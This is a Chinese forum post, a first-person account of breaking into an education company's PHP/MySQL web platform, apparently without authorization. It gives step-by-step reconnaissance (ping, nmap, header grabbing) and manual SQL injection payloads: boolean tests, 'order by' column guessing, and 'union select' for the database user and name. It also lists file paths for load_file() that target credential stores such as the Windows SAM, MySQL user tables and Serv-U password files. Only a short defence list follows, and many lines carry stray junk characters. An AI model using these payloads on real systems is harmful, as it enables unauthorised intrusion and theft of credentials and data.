找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2559|回复: 0
打印 上一主题 下一主题

记一次Linux系统PHP注入入侵检测

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 22:23:32 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
题记:
: C8 T" I9 N8 m" V% y一位朋友在某教育公司,一套网络教育平台。一年前,在2008年8月份的时候,我看到了这套平台,当时发现了个注入漏洞,测试了一下,得到一个可用帐户后就没有再继续下去。今天7月,又说到此事,我决定继续下去……
* M: i8 ]" n' F4 R( z3 u+ c第一步:获取需要的信息4 R; e; Z/ n: m0 I4 g4 ]! B
由于之前测试过,知道此系统某处存在SQL注入漏洞。但由于时隔一年,岁月的远去已经深深的隐藏了那个SQL注入漏洞的地址,现在需要重新收集服务器有用信息。
9 p: g1 m' t, @1 d8 x2 {; h注:以下为保护特用XXX代替敏感信息! ~3 F1 A3 }( r1 R. v3 K6 d: l/ \
顺手先PING了一下他们的域名:
4 x( `0 J. K, Y5 _7 y$ ^ping XXX.XXX.XXX.XXX(本文约定:用XXX.XXX.XXX.XXX代表测试IP和域名)2 D' G- g* E6 ~4 g* E+ A, ?
64 bytes from *********: icmp_seq=1 ttl=246 time=1.87 ms7 m. y- J* n# C! r- U: ~$ O
顺便了解一下TTL,学好基础知识才能一路顺风:
2 x' Q( a6 V/ r! M/ h. gTTL:(Time To Live ) 生存时间
! r, U0 }) ~: T  f指定数据包被路由器丢弃之前允许通过的网段数量。9 U" e2 @: Z$ L2 W
TTL 是由发送主机设置的,以防止数据包不断在 IP 互联网络上永不终止地循环。转发 IP 数据包时,要求路由器至少将 TTL 减小 1。( v# m( D; k2 y1 I
使用PING时涉及到的 ICMP 报文类型
3 r* _( N. _* |3 w: a一个为ICMP请求回显(ICMP Echo Request)/ g3 P2 L, ?+ n! `7 A2 [
一个为ICMP回显应答(ICMP Echo Reply)
( q! ?+ m' o) P% L+ Q# zTTL 字段值可以帮助我们识别操作系统类型。/ Z+ g4 M! K; }6 d6 s- y; T& h
UNIX 及类 UNIX 操作系统 ICMP 回显应答的 TTL 字段值为 255
1 Z# Q2 R2 i, LCompaq Tru64 5.0 ICMP 回显应答的 TTL 字段值为 64& \9 @  Q' X# _$ E8 C
微软 Windows NT/2K操作系统 ICMP 回显应答的 TTL 字段值为 128$ t" S! D5 Y, v* Z( i
微软 Windows 95 操作系统 ICMP 回显应答的 TTL 字段值为 322 a  P! l& N$ ~  ]  ?
当然,返回的TTL值是相同的
' I) w( O0 M# l! n% r# r2 d但有些情况下有所特殊
' i6 R6 m$ x2 i/ _LINUX Kernel 2.2.x & 2.4.x ICMP 回显应答的 TTL 字段值为 64
/ c$ [1 ~3 k  a# cFreeBSD 4.1, 4.0, 3.4;
. R; Q2 x, o; r/ e% x3 lSun Solaris 2.5.1, 2.6, 2.7, 2.8;& v! [) @5 ~$ x& T
OpenBSD 2.6, 2.7,
7 D4 l$ w5 d2 e4 a: P% ANetBSD+ i* M- A# S. N
HP UX 10.20
- M+ b8 c7 I/ ^; D7 mICMP 回显应答的 TTL 字段值为 255
  U  v8 W/ ?9 I+ CWindows 95/98/98SE
4 }8 M* d7 b( b  x; W5 B9 |Windows ME
0 ?- G& O: x' \ICMP 回显应答的 TTL 字段值为 32
0 _) }/ [4 W& w: D. hWindows NT4 WRKS9 |$ ~( F$ z$ H5 M; q# K$ z
Windows NT4 Server
% E; R# ?! W6 sWindows 2000
' O7 f; u+ _1 E  xWindows XP
1 C/ \$ H/ S' J' V# WICMP 回显应答的 TTL 字段值为 128
) @, k% i& [5 ?6 a0 O$ {' p- f9 Q这样,我们就可以通过这种方法来辨别操作系统
2 ^/ Z+ J9 e  ~  T. A: ]TTL值的注册表位置HKEY_LOCAL_MACHINE\SYSTEM \CurrentControlSet\Services\Tcpip\Parameters 其中有个DefaultTTL的DWORD值,其数据就是默认的TTL值了,我们可以修改,但不能大于十进制的255
' t( L$ M* M( U! t. L( S用NMAP扫描一下:
6 D) V" L4 z7 C5 g. P/ |& o, V4 M; vnmap -sT -O XXX.XXX.XXX.XXX
  w: a% y# O( U$ ^, j如果没有装WinPcap则会弹出提示:7 a' D4 W& k( n3 h# R6 ^
WARNING: Could not import all necessary WinPcap functions.  You may need to upgr) i3 \4 e$ _( z) c& ]
ade to version 3.1 or higher from http://www.winpcap.org.  Resorting to connect(
0 D0 ^! ~. @" L1 }) mode — Nmap may not function completely4 v' F: M; R# K- N8 s! i
TCP/IP fingerprinting (for OS scan) requires that WinPcap version 3.1 or higher
+ b' ^7 @# z  A& a2 ^4 Hand iphlpapi.dll be installed. You seem to be missing one or both of these.  Win+ Y3 U4 F3 M; e. y2 J# H) b
pcap is available from http://www.winpcap.org.  iphlpapi.dll comes with Win98 an6 S; `0 @3 b0 |  T% t1 y
d later operating sytems and NT 4.0 with SP4 or greater.  For previous windows v
: S- X4 T3 F- `& y  k6 R8 M  x: Yersions, you may be able to take iphlpapi.dll from another system and place it i
* ?6 q# G4 T/ [/ H3 c1 \9 Q  `n your system32 dir (e.g. c:\windows\system32)." S- a. u2 W7 C
QUITTING!
: p, W+ l/ I( Z* q. Y- Y0 k到这里下载: http://www.winpcap.org/install/bin/WinPcap_4_1_1.exe" D+ I) v* A7 L. p
安装后继续执行刚才的命令,等待扫描完毕后得到入下信息:
& W! ~: C3 ]: H! f9 B3 Q* Q& q4 a" R7 DInteresting ports on XXX.XXX.XXX.XXX:
" u) |+ T% V* P$ i9 tNot shown: 986 closed ports! T! Z& L+ ~8 h: t1 y- f( b6 Y
PORT     STATE    SERVICE
; u# |% }6 f/ j9 V. k1 T21/tcp   open     ftp
/ @  O. t- P1 B, `: l' Y22/tcp   open     ssh
! P3 g6 w5 d. ]3 c$ F( H" Y23/tcp   open     telnet3 ]1 _" w4 Z$ s# ?  ?' z
80/tcp   open     http
2 R" Q3 ], L' Y8 p111/tcp  open     rpcbind
: }2 w3 v, F, h2 s4 X135/tcp  filtered msrpc
1 v. L/ w, w$ q1 W6 E; R3 z& N1 V139/tcp  filtered netbios-ssn
, K: B. q+ y1 q" [5 ^& _6 s) e445/tcp  filtered microsoft-ds2 b& O6 d) Y2 d  I1 Q% u
513/tcp  open     login
7 W+ X2 E% J( a7 w1 S514/tcp  open     shell
1 g* U/ J4 k3 b4 I8 P/ b, }, G593/tcp  filtered http-rpc-epmap: _* E2 f: C/ ]- u) B( g
1720/tcp filtered H.323/Q.931! o$ [; b* @6 K1 Z5 {
3306/tcp open     mysql
+ B& a. K2 L2 J( }; t" E4444/tcp filtered krb524& F5 j: m: a; m/ s* \2 t
Device type: WAP6 a1 j7 W& e6 _& d
Running: Linux 2.4.X  K2 J  p, A% M2 b1 k* K
OS details: DD-WRT (Linux 2.4.35s)) E/ |* ^+ U7 F. w) h/ M
Network Distance: 13 hops
$ e$ B) m$ U7 [3 K" i" x' a8 P看到SSH22端口是开着的,打开putty试一下,看是否可以正常连接:/ n" b# g. p9 w" T- Q7 f0 U
login as:) f' e& k. J: ]2 K/ v( s  Y8 N
Telnet23端口也是开着的,用telnet 命令链接一下:
  D! I0 H/ M7 E0 ]* o) Y, Qtelnet XXX.XXX.XXX.XXX
# w( l) P. u! a8 r8 V  \. T" a0 H1 z/ J提示:
0 Q3 J8 b( }& U" l* nRed Hat Enterprise Linux Server release 5.2 (Tikanga)' w1 i" ~9 o) {7 ?: X; Z7 l
Kernel 2.6.18-92.el5PAE on an i686
8 z# g; ^9 `9 c( V: vlogin:' n1 L  T- E9 ?4 Y9 n" q
获取HTTP头信息:1 `# p# I7 A$ u+ ~  j" h/ A
在本地执行如下PHP代码: N# |" [; r: W' O
<?php
' J+ l3 u( j* t% L% u* Y$url = ‘XXX.XXX.XXX.XXX’;" @+ }  L& |7 B) @2 f# w0 [' ?
print_r(get_headers($url));& [1 L3 g$ ]5 C2 b, S3 ]. o
print_r(get_headers($url, 1));; F" K7 F9 t/ ~# f; f4 P8 I+ A' b
?>, b  F' \! {8 g2 `: n3 u, q
将以上代码保存为PHP文件,执行:
; G3 `4 l5 b& |. u7 g: o% f3 xArray ( [0] => HTTP/1.1 200 OK [1] => Server: nginx/0.7.61 [2] => Date: Mon, 02 Nov 2009 09:06:48 GMT [3] => Content-Type: text/html; charset=gb2312,gbk,utf-8 [4] => Content-Length: 75 [5] => Last-Modified: Thu, 20 Aug 2009 19:35:37 GMT [6] => Connection: close [7] => Accept-Ranges: bytes ) Array ( [0] => HTTP/1.1 200 OK [Server] => nginx/0.7.61 [Date] => Mon, 02 Nov 2009 09:06:48 GMT [Content-Type] => text/html; charset=gb2312,gbk,utf-8 [Content-Length] => 75 [Last-Modified] => Thu, 20 Aug 2009 19:35:37 GMT [Connection] => close [Accept-Ranges] => bytes )
1 D4 K, {) b- k" ^) }, Y+ P现在可以得出结论:5 d9 `5 W6 P& ~0 z( t
系统版本:Red Hat Enterprise Linux Server release 5.2 (Tikanga)
7 ]6 ^; X! T: \9 e& s8 [" U9 X( ~内核版本:Kernel 2.6.18-92.el5PAE on an i686! @, e: \$ J% T% r+ z( O. E8 k. w
WEB服务器版本:nginx/0.7.61
; [: A. ]+ O: I& ^/ F3 R* Q第二步,开始测试寻找漏洞
" t/ z* ], g; a1 Q* I: {) E分析是否存在注入漏洞,因为上次曾发现存在过,所以注入则是我们的首选。5 X  {/ n  ?4 m* D% X% {: U
1、敏感地址:站内存在有类似:http://www.fovweb.com/XXX.php?id=123 这种地址,属动态传参的
, W8 P9 j, g* w' U. o' x* |3 g7 |2、测试方法:在地址后加 and 1=1 和 and 1=2 测试
! O5 g  x/ l9 v; Hhttp://www.fovweb.com/XXX.php?id=123 and 1=1 返回正常
' T0 \1 _# b0 m$ p7 w3 Thttp://www.fovweb.com/XXX.php?id=123 and 1=2 返回错误
$ ]1 M3 U: @/ z" I恭喜,两次返回结果不同,则很有可能存在未过滤敏感字符而存在SQL注入漏洞,我们继续
1 F3 c" M; s# H# ^9 J6 J% N( L; X3、手工注入:  u5 b: l" l! `0 g, Y
注入也应该有个思路,不能随便碰运气,要记住入侵检测不是靠运气而走下去的,要靠的是清晰的思路、过硬的技术、很全的知识面。
9 l0 g# `( g" M, F! x* g) A3.1 猜测当前表字段数" `* P8 L; V! \( b4 H7 V
http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 10
0 [& D5 ~+ r3 M  q' i  e此处猜测有个简单的算法,都是有技巧的吗,呵呵& i5 L4 @( p9 \! {, l% y- F6 G9 J
算法简单如下:
0 t1 \( X. T7 l2 X2 B第一步:根据页面信息,大概估算一个数值,这个是要靠一定的经验了;4 y+ W* Y" @. C+ i" K( l4 w3 T
第二步:取中算法,好比是10,如果返回错误,则取中间值5进行下一次猜测;' u/ m# C  k, a$ o( i% l6 a  z
需要注意:如果所选数值在字段数范围内即小于等于,则会(返回正常);如果所选数值在字段范围外即大于等于,则会(返回错误)。
* t% q+ L6 P3 v& {7 @# f8 K$ T以此来判断,是否过界,配合取中算法猜出字段数。' o$ [' S0 J: W( C
举例:; `) i/ N4 n  t4 K
http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 3 返回正常
! k$ }+ G; y  R, S/ X) I1 Dhttp://www.fovweb.com/XXX.php?id=123 and 1=1 order by 4 返回错误
( @  U6 {9 a9 e# L此时3则为我们要找的字段数。
5 X4 L( h- }5 \- V! x5 S3.2 配合union联合查询字段在页面所位置! {1 d& Y( r% Z. R- F, O  v2 O  D0 X
我们已经知道了字段数为3,此时则可以做如下操作:3 d  T4 v8 [7 ?8 L. t
http://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,2,3
' R+ U+ _9 m- L' F5 O( a& u: |1 B9 ?8 B! Y3 K
这样就可以测试到哪些字段在页面上有所显示了,如图:
# ], Q- N7 q, A$ M; ?( w* ^$ K2 V- Q9 ^% b. j$ d
3.3 查敏感信息% O0 U% N% {" a% D
这也是个思路问题,我们需要什么,其实到了这一步已经能做什么多事情了。: y; K, {% J! I
http://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,user(),database()* ]/ o! `, ]& N/ y) V
3.3.1 先查数据库用户、数据库名,以备后用,如图:+ P) b; U2 G& a" v6 K) V! c
1 g) r( l, A% t0 J7 V
得到数据库用户为root、数据库名为DBxx;
, @& I$ {& Y9 O; \; G9 `0 ^3.3.2 查配置文件
; k: ]9 E* \/ K' o$ O查配置文件,就是指查看系统敏感的文件,如web服务器配置文件等。
' L  ~# u% t: t7 I: I7 A; b/ x查看文件有一定的条件限制:0 d/ |' Y: l1 r) K
欲读取文件必须在服务器上
5 I; H7 N$ R& t, B/ K必须指定文件完整的路径
& O8 D+ k! |$ Q; l2 T必须有权限读取并且文件必须完全可读
/ D8 u7 |* g" H; \, o3 H4 L欲读取文件必须小于 max_allowed_packet% p6 V' n! D! Y4 C6 [. Z
MYSQL注入中,load_file()函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件。8 R  m2 u# k; M! l, H9 q
常用的一些:
8 {) e: f' Q, \9 h/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件% \) Q/ h8 ?5 \# C) v9 S/ C
/usr/local/apache2/conf/httpd.conf, _# Y. i% c9 ]% O0 s
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置$ W0 E8 Z, w" P1 d6 v# v2 J3 M
/usr/local/app/php5/lib/php.ini //PHP相关设置
( T8 O( f, k! H0 m, K/ c& |, |' ]/etc/sysconfig/iptables //从中得到防火墙规则策略
" h" V) d2 E4 {6 }/etc/httpd/conf/httpd.conf // apache配置文件$ S* s4 {% U3 e+ b1 {' S; E# |
/etc/rsyncd.conf //同步程序配置文件
; ?. b# b! N% s; Y4 ]4 {! r/etc/sysconfig/network-scripts/ifcfg-eth0 //查看IP.7 y6 V: Y! S$ L" M
/etc/my.cnf //mysql的配置文件
( J; z6 c. G6 I* V* F/etc/redhat-release //系统版本
9 j% }8 w* H* a% @( U4 x# T5 a/etc/issue
+ m. ~. ~! d& V1 B/ @: h/etc/issue.net
5 i4 d) H+ m2 E( E, V9 Pc:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码& I2 q' {! a) _# V2 _' [
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码
% {# u* p6 c0 k: m' {5 tc:\Program Files\Serv-U\ServUDaemon.ini( V$ a" n1 J3 \# U  }3 D5 w2 L
c:\windows\my.ini //MYSQL配置文件
" B8 i! C1 \7 ^2 S! z" @, zc:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件
! _" j' b% t5 P. r+ _+ i等等。实际上,load_file()的作用不止于此,它还可以用来读取系统中的二进制文件,: W. n1 l! E, z# \6 \5 @4 W: c
c:\windows\repair\sam //存储了WINDOWS系统初次安装的密码
3 H7 v2 @0 c2 r9 lc:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此
* O( n0 m9 j& b2 ]% L1 Fc:\Program Files\RhinoSoft.com\ServUDaemon.exe: A( d/ F! C" q! H* v8 ?$ }
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件- @) h# T- H8 f
//存储了pcAnywhere的登陆密码2 J7 |7 |+ Z6 Y& p
由于之前得到信息,此台服务器是采用的nginx做的Web服务器,那我们就来试着找一下nginx的安装路径吧。
; k9 `0 e' o9 E, t这个没有技术性可言,纯靠经验和运气,由于很少用nginx不了解,我就先到网上搜索常用的安装路径,以及比较好的配置文档中的安装路径进行测试,最终,得到nginx安装路径“/usr/local/nginx/conf/nginx.conf”。, ]8 I7 d7 Y" ~+ W2 L0 e% S
最后:防范措施
2 R3 K. B& ^4 }% w5 p1、修复PHP注入漏洞;+ F% P: \5 J% D  @9 R% e
2、Mysql使用普通权限的用户;
9 h# T; T+ f1 Y3 q3 `+ l3、升级linux内核至最新版本;
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表